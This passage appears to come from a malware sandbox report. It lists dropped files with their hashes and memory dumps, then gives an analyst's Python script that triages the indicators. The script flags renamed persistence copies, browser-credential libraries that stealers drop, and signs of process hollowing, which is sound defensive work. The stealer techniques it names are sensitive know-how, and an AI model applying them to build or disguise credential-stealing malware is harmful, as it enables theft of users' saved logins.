memory/2524-219-0x0000000000B90000-0x0000000000C00000-memory.dmp
memory/2524-220-0x0000000000550000-0x0000000000551000-memory.dmp
memory/4008-221-0x0000000000000000-mapping.dmp
C:\Users\Public\nest.bat
| MD5 | 8ada51400b7915de2124baaf75e3414c |
| SHA1 | 1a7b9db12184ab7fd7fce1c383f9670a00adb081 |
| SHA256 | 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7 |
| SHA512 | 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68 |
memory/64-223-0x0000000000000000-mapping.dmp
memory/3728-224-0x0000000005060000-0x00000000050D2000-memory.dmp
memory/3732-226-0x0000000004B50000-0x0000000004BC7000-memory.dmp
memory/1192-225-0x0000000005790000-0x0000000005802000-memory.dmp
memory/3728-228-0x0000000004FF0000-0x0000000005010000-memory.dmp
memory/1192-227-0x0000000005720000-0x000000000573F000-memory.dmp
memory/3732-229-0x00000000055B0000-0x00000000055D6000-memory.dmp
memory/3040-230-0x0000000000400000-0x0000000000408000-memory.dmp
memory/216-231-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3040-232-0x0000000000403BEE-mapping.dmp
memory/216-233-0x000000000040616E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/4044-239-0x0000000000000000-mapping.dmp
memory/580-243-0x0000000000000000-mapping.dmp
memory/2288-244-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp
| MD5 | bc2b6748d2661e9ce52308b3370f3cd3 |
| SHA1 | 525a293e2aae508e0963f4a4a4c6927f8528e31a |
| SHA256 | 44049739773b479c5cbb04a4bf8371d0d365a7be7c65f765c62a57358f346e82 |
| SHA512 | 568d161df4269764b26ce7c8e1f9ed8a726f6bf7234b8a2b1427ca14c30f90ca789f561a9e815a15940570d542e4baa656c002ff1f4be32dd5c7857b8e576957 |
memory/1484-248-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1484-249-0x000000000040C71E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\12LA5TJUB3.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
C:\Windows\temp\i2gwbrqy.inf
| MD5 | f0592949b756677f5e2dedc4089fa849 |
| SHA1 | d2546de183ea26fee3cab283e2e45dbad7493c5b |
| SHA256 | e69805ca130fec7259801b63c3cd3eafec9a4cc6e4d8168c1a55bdab4e7ff96f |
| SHA512 | 1ceabc24a994e665d9ffe797e6ef3b06dac2f11ff9c718c3f50a7b65e0506bd5aea4ac86fc5b9e851c0c36e9912a709d9717e933459d3d23a24c0c18d771de6c |
memory/580-252-0x0000000006A60000-0x0000000006A61000-memory.dmp
memory/580-256-0x00000000068E0000-0x00000000068E1000-memory.dmp
memory/580-257-0x00000000070A0000-0x00000000070A1000-memory.dmp
memory/216-259-0x0000000004D10000-0x000000000520E000-memory.dmp
memory/216-258-0x0000000004D10000-0x000000000520E000-memory.dmp
memory/580-260-0x0000000006A62000-0x0000000006A63000-memory.dmp
memory/580-261-0x0000000006DF0000-0x0000000006DF1000-memory.dmp
memory/580-262-0x0000000006E90000-0x0000000006E91000-memory.dmp
memory/580-263-0x0000000006F00000-0x0000000006F01000-memory.dmp
memory/580-265-0x00000000076D0000-0x00000000076D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1QL8Pt2Uq1.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
memory/2248-267-0x0000000000000000-mapping.dmp
memory/3640-268-0x0000000000000000-mapping.dmp
memory/1484-269-0x0000000005080000-0x0000000005081000-memory.dmp
memory/3640-272-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
C:\Windows\temp\h3gk1fsv.exe
| MD5 | f4b5c1ebf4966256f52c4c4ceae87fb1 |
| SHA1 | ca70ec96d1a65cb2a4cbf4db46042275dc75813b |
| SHA256 | 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03 |
| SHA512 | 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e |
C:\Windows\Temp\h3gk1fsv.exe
| MD5 | f4b5c1ebf4966256f52c4c4ceae87fb1 |
| SHA1 | ca70ec96d1a65cb2a4cbf4db46042275dc75813b |
| SHA256 | 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03 |
| SHA512 | 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e |
memory/2748-274-0x0000000000000000-mapping.dmp
memory/1116-275-0x0000000000000000-mapping.dmp
memory/580-276-0x0000000006AF0000-0x0000000006AF1000-memory.dmp
memory/580-277-0x0000000007CB0000-0x0000000007CB1000-memory.dmp
memory/580-281-0x0000000007D00000-0x0000000007D01000-memory.dmp
memory/2748-284-0x0000028C883D3000-0x0000028C883D5000-memory.dmp
memory/2748-283-0x0000028C883D0000-0x0000028C883D2000-memory.dmp
memory/2748-285-0x0000028CA0910000-0x0000028CA0911000-memory.dmp
memory/2748-288-0x0000028CA0AC0000-0x0000028CA0AC1000-memory.dmp
memory/2748-293-0x0000028C883D6000-0x0000028C883D8000-memory.dmp
memory/580-315-0x00000000089C0000-0x00000000089F3000-memory.dmp
memory/580-331-0x000000007E7B0000-0x000000007E7B1000-memory.dmp
memory/580-333-0x0000000006A63000-0x0000000006A64000-memory.dmp
memory/1468-372-0x0000000000000000-mapping.dmp
memory/2508-377-0x0000000000000000-mapping.dmp
memory/980-382-0x0000000000000000-mapping.dmp
memory/2644-388-0x0000000000000000-mapping.dmp
memory/2024-397-0x0000000000000000-mapping.dmp
memory/3804-404-0x0000000000000000-mapping.dmp
memory/1468-411-0x0000016E61140000-0x0000016E61142000-memory.dmp
memory/4160-413-0x0000000000000000-mapping.dmp
memory/1468-415-0x0000016E61143000-0x0000016E61145000-memory.dmp
memory/980-419-0x000002A2EBA90000-0x000002A2EBA92000-memory.dmp
memory/980-420-0x000002A2EBA93000-0x000002A2EBA95000-memory.dmp
memory/2508-423-0x000002B60B320000-0x000002B60B322000-memory.dmp
memory/2508-426-0x000002B60B323000-0x000002B60B325000-memory.dmp
memory/2644-430-0x0000027051CF0000-0x0000027051CF2000-memory.dmp
memory/2644-433-0x0000027051CF3000-0x0000027051CF5000-memory.dmp
memory/4296-425-0x0000000000000000-mapping.dmp
memory/4432-437-0x0000000000000000-mapping.dmp
memory/2024-451-0x0000016B04640000-0x0000016B04642000-memory.dmp
memory/4160-453-0x000001C8770D0000-0x000001C8770D2000-memory.dmp
memory/2024-455-0x0000016B04643000-0x0000016B04645000-memory.dmp
memory/3804-457-0x0000026C2A770000-0x0000026C2A772000-memory.dmp
memory/3804-458-0x0000026C2A773000-0x0000026C2A775000-memory.dmp
memory/4160-459-0x000001C8770D3000-0x000001C8770D5000-memory.dmp
memory/4296-465-0x000001E07F163000-0x000001E07F165000-memory.dmp
memory/4296-463-0x000001E07F160000-0x000001E07F162000-memory.dmp
memory/4432-476-0x000001636FD00000-0x000001636FD02000-memory.dmp
memory/4432-477-0x000001636FD03000-0x000001636FD05000-memory.dmp
memory/4296-500-0x000001E07F166000-0x000001E07F168000-memory.dmp
memory/4352-511-0x0000000000000000-mapping.dmp
memory/1468-521-0x0000016E61146000-0x0000016E61148000-memory.dmp
memory/2508-524-0x000002B60B326000-0x000002B60B328000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4948-543-0x0000000000000000-mapping.dmp
memory/980-550-0x000002A2EBA96000-0x000002A2EBA98000-memory.dmp
memory/2644-555-0x0000027051CF6000-0x0000027051CF8000-memory.dmp
memory/4352-581-0x000002597B9A0000-0x000002597B9A2000-memory.dmp
memory/2024-589-0x0000016B04646000-0x0000016B04648000-memory.dmp
memory/4352-585-0x000002597B9A3000-0x000002597B9A5000-memory.dmp
memory/4948-619-0x0000016DCC0C0000-0x0000016DCC0C2000-memory.dmp
memory/4948-624-0x0000016DCC0C3000-0x0000016DCC0C5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 7247129cd0644457905b7d6bf17fd078 |
| SHA1 | dbf9139b5a1b72141f170d2eae911bbbe7e128c8 |
| SHA256 | dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4 |
| SHA512 | 9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4896-652-0x0000000000000000-mapping.dmp
memory/3804-699-0x00007FF6C0550000-0x00007FF6C0551000-memory.dmp
memory/4896-723-0x0000018ED03B0000-0x0000018ED03B2000-memory.dmp
memory/4896-725-0x0000018ED03B3000-0x0000018ED03B5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c2263b17c6d6cc450042af097ec9637e |
| SHA1 | a1c15c9c8ec782e901b765f30c8e6e128a703b58 |
| SHA256 | a0063db0c47765089745e0600c0afff25d3ed7c4a3072cd28b55e7488c7b1a8e |
| SHA512 | 7b0077eb77f6967b732169618404354b97163d445810accabdbc53f7efb4b1385d6021dad686d6446186ee37464f80d228613455429b2fc122198e0bbbc8c10b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 1a8c542e6d44e65f4be561e6d7013e56 |
| SHA1 | 96476eba76d1a713e9856ce49f060c3dabd00f9e |
| SHA256 | 16b857d9ab9e4ba09f2ebade0aad62a2b28d17dee22b281e2b326d99c57a6762 |
| SHA512 | 0dd7489aacc2ccc952ce1ff69de05cdd7c57fea39c8e29dc31cdd5313101f466610ab98f42c7c2230b3a284dace93230283233fe2cc10830d666633215f56374 |
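The listing above is raw sandbox output: a path line followed by `| ALGO | digest |` rows, interleaved with `memory/PID-seq-0xADDR[-0xEND]-{mapping,memory}.dmp` entries. As an added example (not part of the report or of the sandbox's own tooling), the Python below parses that format into records and pulls out the three things a responder wants from this dump: the same SHA256 written under a second name (the payload `4zzCjUa1iG.exe` reappears as `sqlcmd.exe` under `%APPDATA%\Microsoft\Network`, which together with the Run key and scheduled task in the summary is the persistence copy), the legitimate Mozilla NSS and SQLite libraries (nss3.dll, mozglue.dll, softokn3.dll, freebl3.dll, sqlite3.dll) dropped into `ProgramData` and `LocalLow`, which stealers in the Azorult/Raccoon/Vidar family carry so they can decrypt saved Firefox logins and read browser SQLite stores, and `mapping.dmp` entries whose address sits inside a page rather than on a section boundary, which is consistent with the SetThreadContext signature (the dump was taken at a thread entry point placed into a hollowed process). It also checks each digest has the length its algorithm requires, a cheap guard against copy/paste truncation when hashes go into a blocklist. The sample input is a constructed excerpt of the listing (hashes copied from it); the `CRED_LIBS` set, the page-alignment heuristic and the `\program files` exclusion are my assumptions, not something the report states.

```python
"""Parse a sandbox dropped-file/memory-dump listing into IOC records and flag stealer patterns."""
import re
from collections import defaultdict

# Constructed excerpt of the report listing, kept in its own format.
SAMPLE = r"""
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
| MD5 | 02cc7b8ee30056d5912de54f1bdfc219 |
| SHA256 | 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
memory/1392-133-0x000000000041A684-mapping.dmp
memory/212-135-0x0000000000400000-0x0000000000495000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
memory/3856-150-0x0000000000000000-mapping.dmp
memory/3176-210-0x00000000004019E4-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEM_DUMP = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(mapping|memory)\.dmp$")
HASH_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
# Assumption: Mozilla NSS / SQLite libraries that credential stealers drop beside
# themselves to decrypt Firefox logins and read browser SQLite databases.
CRED_LIBS = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll", "sqlite3.dll"}
PAGE = 0x1000


def parse_listing(text):
    """Return (file_records, memory_dumps) parsed from the listing text."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_DUMP.match(line)
        if m:
            pid, seq, start, end, kind = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq), "start": int(start, 16),
                          "end": int(end, 16) if end else None, "kind": kind})
            current = None  # a dump entry closes the open file record
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            current[m.group(1).lower()] = m.group(2).lower()
            continue
        current = {"path": line}  # any other line starts a new file record
        files.append(current)
    return files, dumps


def hashes_well_formed(rec):
    """True when every digest present has the length its algorithm requires."""
    return all(len(rec[algo]) == n for algo, n in HASH_LEN.items() if algo in rec)


def renamed_copies(files):
    """SHA256 -> sorted distinct (case-folded) paths for digests seen under more than one name."""
    by_hash = defaultdict(set)
    for rec in files:
        if "sha256" in rec:
            by_hash[rec["sha256"]].add(rec["path"].lower())
    return {h: sorted(paths) for h, paths in by_hash.items() if len(paths) > 1}


def dropped_credential_libs(files):
    """Paths of NSS/SQLite DLLs written anywhere other than a vendor install directory."""
    hits = []
    for rec in files:
        name = rec["path"].rsplit("\\", 1)[-1].lower()
        if name in CRED_LIBS and "\\program files" not in rec["path"].lower():
            hits.append(rec["path"])
    return hits


def unaligned_mapping_entries(dumps):
    """(pid, address) for mapping dumps whose address lies inside a page: a code
    location such as an injected thread's entry point, not a section base.
    Zero-address entries carry no address and are skipped."""
    return [(d["pid"], d["start"]) for d in dumps
            if d["kind"] == "mapping" and d["start"] and d["start"] % PAGE]


def triage(text=SAMPLE):
    """Summarise one listing as a dict of findings."""
    files, dumps = parse_listing(text)
    return {
        "files": len(files),
        "dumps": len(dumps),
        "malformed_hashes": [r["path"] for r in files if not hashes_well_formed(r)],
        "renamed_copies": renamed_copies(files),
        "credential_libs": dropped_credential_libs(files),
        "unaligned_mappings": unaligned_mapping_entries(dumps),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Feed `triage()` the full listing rather than the excerpt and the same grouping also shows that the two `sqlite3.dll` copies (LocalLow and ProgramData) have different hashes, i.e. two builds of the library were dropped by different stages, and that every `12LA5TJUB3.exe`, `INNff8Vdy3.exe` and `eRqSXd3z7r.exe` entry is one binary written more than once.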